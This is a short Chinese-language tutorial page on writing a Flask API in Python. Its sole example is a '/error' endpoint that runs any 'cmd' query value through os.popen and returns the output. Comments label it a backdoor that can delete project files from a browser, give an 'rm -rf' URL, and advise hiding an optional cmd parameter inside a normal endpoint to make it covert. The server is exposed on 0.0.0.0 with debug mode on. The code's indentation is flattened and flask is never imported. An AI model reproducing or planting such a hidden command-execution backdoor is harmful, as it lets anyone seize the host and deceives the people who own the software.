您现在的位置是:课程教程文章

如何用python写接口

2023-12-18 22:19课程教程文章 人已围观

如何用python写接口?具体步骤如下: 

1、实例化server

2、装饰器下面的函数变为一个接口

3、启动服务

相关推荐:《Python基础教程》

开发工具和流程:

python库:flask =》实例化server:server = flask.Flask(__name__) =》@server.route('/index',methods=['post'])

=》def index(arg):{}

例子:

import os
@server.route('/error',methods=['get'])
def cmd():
cmd = flask.request.values.get('cmd') # 接口入参
res = os.popen(cmd) # 执行用户命令
return res.read() # 返回执行结果
# http://127.0.0.1:8888/error?cmd=rm -rf a.txt 后门接口可以直接通过浏览器删除项目文件
# 隐蔽一点的方法,把cmd = flask.request.values('cmd',None)写入正常接口
# 默认可以不传,一但传了再res = os.popen(cmd)
server.run(port=8888,debug=True,host='0.0.0.0') # 启动服务
# debug=True,改了代码后,不用重启,它会自动重启
# 'host='0.0.0.0'别人可以通过IP访问
课程教程:如何用python写接口

上一篇:python3怎么安装pip

下一篇:没有了

站点信息

  • 文章统计篇文章